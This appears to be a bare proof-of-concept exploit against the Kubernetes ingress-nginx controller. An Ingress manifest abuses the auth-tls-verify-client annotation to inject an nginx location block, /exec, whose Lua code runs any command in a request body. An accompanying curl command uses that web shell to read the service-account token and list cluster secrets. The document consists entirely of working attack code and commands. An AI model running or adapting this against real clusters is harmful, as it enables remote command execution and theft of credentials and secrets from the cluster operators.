helm -n ingress-nginx install ingress-nginx ingress-nginx/ingress-nginx --create-namespace --version 4.11.1
kubectl port-forward --namespace=ingress-nginx service/ingress-nginx-controller 8080:80
curl -H 'Host: demo.me' --data 'curl -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" -k https://kubernetes.default.svc.cluster.local/api/v1/namespaces/default/secrets' localhost:8080/exec
| apiVersion: networking.k8s.io/v1 | |
| kind: Ingress | |
| metadata: | |
| annotations: | |
| nginx.ingress.kubernetes.io/auth-tls-secret: default/ca-secret | |
| nginx.ingress.kubernetes.io/auth-tls-verify-client: |- | |
| on; | |
| location /exec { | |
| content_by_lua_block { | |
| ngx.req.read_body() | |
| local cmd = ngx.req.get_body_data() | |
| local f = io.popen(cmd) | |
| local content = f:read "*a" | |
| f:close() | |
| ngx.say(content) | |
| ngx.exit(ngx.HTTP_OK) | |
| } | |
| } # | |
| name: demo-localhost | |
| namespace: default | |
| spec: | |
| ingressClassName: nginx | |
| rules: | |
| - host: demo.me | |
| http: | |
| paths: | |
| - backend: | |
| service: | |
| name: demo | |
| port: | |
| number: 80 | |
| path: / | |
| pathType: Prefix |